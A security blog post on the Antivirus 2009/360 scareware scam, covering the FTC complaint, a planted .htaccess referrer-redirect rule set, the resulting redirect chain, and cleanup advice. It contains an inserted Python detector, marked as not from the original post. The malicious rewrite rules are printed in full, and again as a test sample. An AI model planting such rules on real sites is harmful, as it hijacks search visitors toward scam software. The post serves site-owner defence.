
This is a new post in the series about the Antivirus 2009 .htaccess exploit. I want to share some new information on the topic.
The Federal Trade Commission filed the complaint against the organizers of the bogus computer scanners scam on December 2, 2008 in the U.S. District Court for the District of Maryland.
According to the FTC, the scheme has tricked more than one million consumers into buying computer security products such as WinFixer, WinAntivirus, DriveCleaner, ErrorSafe, and XP Antivirus.
This explains why hackers break into even very small sites: they have a way to monetize your site’s vulnerability, and more than $40,000,000 in sales is well worth the trouble.
Meanwhile, the malicious scheme is still live. Every day scammers register new domains and change servers.
They have also changed the name of their “scanner”. Now it is called Antivirus 360. They just replaced 2009 with 360. Everything else is identical.
I also noticed that hackers have started to insert a slightly modified version of the code into .htaccess files.
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://alamaat.com/video/wmv.php [R,L]
It looks like they are no longer interested in Ask.com and Altavista.com traffic. Another change is that the first-level redirect now goes to a compromised Pakistani site.
The whole chain of redirects may look like this:
302 -> http://alamaat .com/ video/wmv.php
302 -> http://ukr-mova .info/flash /go.php?sid=1
302 -> http://protectedgoclicks .com/ soft.php?aid=0553&d=1&product=XPA&refer=d58bf6d15
302 -> http://onlineantivirus-scanner .com/360/ 1/freescan.php?nu=880553
302 -> http://onlineantivirus-scanner .com/360/ 1/en/freescan.php?sid=880553
This new version of the exploit cannot currently be detected by Unmask Parasites. I’m working on the update. Meanwhile, if you suspect this exploit, you can check your .htaccess file or try clicking on search engine results for your site (I suggest that you temporarily disable JavaScript first).
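To make that manual .htaccess check easier, here is an added example (not code from the original post or from Unmask Parasites) that scans .htaccess text for the pattern described in this post: RewriteCond tests on HTTP_REFERER that name search engines, followed by a RewriteRule that redirects off-site. The own_host parameter and the "clean" sample rules are assumptions for illustration.

```python
import re
from typing import List

# Referrer keywords the exploit tests for (from the .htaccess samples in the post).
SEARCH_ENGINES = ("google", "aol", "msn", "yahoo", "ask", "altavista")

def parse_rewrite_blocks(htaccess: str) -> List[dict]:
    """Group each run of RewriteCond lines with the RewriteRule that follows it."""
    blocks, conds = [], []
    for raw in htaccess.splitlines():
        line = raw.strip()
        if line.startswith("RewriteCond"):
            conds.append(line)
        elif line.startswith("RewriteRule"):
            blocks.append({"conds": conds, "rule": line})
            conds = []
    return blocks

def find_referer_redirects(htaccess: str, own_host: str) -> List[str]:
    """Return RewriteRule lines that send search-engine referrers to another host.
    Exploit shape: RewriteCond on %{HTTP_REFERER} naming a search engine, then a
    RewriteRule whose target is an absolute URL on a host other than own_host.
    The keyword match is deliberately loose: this is a triage aid, not a proof.
    """
    hits = []
    for block in parse_rewrite_blocks(htaccess):
        referer_conds = [c.lower() for c in block["conds"] if "%{HTTP_REFERER}" in c]
        if not any(se in c for c in referer_conds for se in SEARCH_ENGINES):
            continue
        target = re.search(r"https?://([^/\s]+)", block["rule"])
        if target and target.group(1).lower() != own_host.lower():
            hits.append(block["rule"])
    return hits

# Constructed sample 1: the modified rule set quoted in the post above.
INFECTED = """RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://alamaat.com/video/wmv.php [R,L]
"""
# Constructed sample 2 (assumed benign): hotlink protection plus a same-host
# landing page for Google visitors; neither block should be reported.
CLEAN = r"""RewriteCond %{HTTP_REFERER} !^$
RewriteCond %{HTTP_REFERER} !^https?://(www\.)?example.org/ [NC]
RewriteRule \.(gif|jpg|png)$ - [F]
RewriteCond %{HTTP_REFERER} .*google.*$ [NC]
RewriteRule ^$ http://example.org/welcome [R,L]
"""
```

Run find_referer_redirects on the contents of each .htaccess file under your web root with your own domain as own_host; every reported line deserves a manual look.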
Another new feature is that the intermediary ukr-mova script now redirects Russian-speaking visitors to a Russian porn site that asks them to send an SMS to obtain full access to its content. This way they are trying to monetize ex-USSR visitors, who are less likely to pay for software with credit cards.
In conclusion, I’d like to warn against half-measures. I’ve recently seen a few sites that got reinfected shortly after removing this exploit.
Deleting .htaccess is not enough! You should also write-protect your server files, change passwords, update scripts, remove suspicious files, etc. Check the How to prevent re-infection section in my previous post for more details.
How do I get the 50 bucks I spent on A360?
Most of these scam operations run outside of United States jurisdiction, so it is unlikely that you will get your $50 back.
Try installing a legit malware scanner such as SysIntegrity Anti-Malware.
http://www.sysintegrity.net/
There’s a way to remove Antivirus 360 manually.